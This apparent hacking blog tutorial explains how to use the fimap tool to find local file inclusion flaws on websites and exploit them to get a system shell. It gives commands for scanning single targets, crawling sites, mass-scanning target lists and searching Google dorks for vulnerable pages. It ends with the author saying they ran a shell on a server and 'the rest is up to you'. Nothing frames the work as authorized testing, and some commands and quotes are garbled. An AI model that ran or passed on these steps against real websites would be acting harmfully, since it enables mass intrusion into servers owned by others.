Today I show you how to use the FIMAP tool written in python to exploit the LFI vulnerability automatically to gain access to the system shell. LFI vulnerability is like SQL Injection. Few web servers suffer from this error.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
FIMAP improves our speed and increases our chances of finding vulnerabilities. FIMAP automates the process, it is capable of single target scanning, Dork google and scanning from file lists.
Also with the FIMAP tool we can collect data from the target website and output the information as a list to be used later for bulk scanning.
System Requirements:
+ Python is already installed on the system https://www.python.org/download/releases/2.7/
+ FIMAP installation https://github.com/Oweoqi/fimap
OK, assuming you already have Python installed, you’ll download the latest version of FIMAP, unzip it to the specified directory. You will need to open a command prompt, cd to the directory where the fimap is located. You can type “-h fimap.py” to see the options available.
You’ll find most of the options and arguments tied to which mode you’re using. There are four basic modes: single scan, batch scan, Google scan, and harvest mode. To scan perform LFI checks and checks against a single url. You just need to provide the URL to scan
COMMAND: fimap.py -s -u http://target-site.com/index2.php?x=
If you are only scanning a single target site you can scan using First Harvester mode to help increase your chances of finding a vulnerable link.
COMMAND: fimap.py -H -u http://target-site.com/ -w output.txt
Note: You can specify the crawl depth by adding the “
COMMAND: fimap.py -H -u http://target-site.com/ -d 3 -w output.txt
Now that we have the output file, we can switch to scan mode and check all the links. You just need the output.txt file from the above step to the following path:
COMMAND: fimap.py -m -l /path/to/list/output.txt
If you want to search with Google and use Google dorks, you can switch modes and use the following syntax:
COMMAND: fimap.py -g -q
Attention: You can further define Google scan parameters by specifying the time in between Google requests using “–googlesleep =
COMMAND: fimap.py -g -q inurl: index2.php?x = –googlesleep = 5000 -p 15 -results = 50
You can find the results stored in two files, which you will need to search on your system: fimap_results (xml) and fimap-log (txt). Two files containing the results are stored from all your scans. You can also type “-x” to see a list of possible targets for mining
COMMAND: fimap.py –x
Select the shell to upload and see the results
I have successfully run the shell on the server. The rest is up to you
In addition, fimap is also used to scan for RFI vulnerabilities. I will present it in the following articles
Currently this tool is still under development so you can follow the project for more information.
You can find it in Kali http://tools.kali.org/web-applications/fimap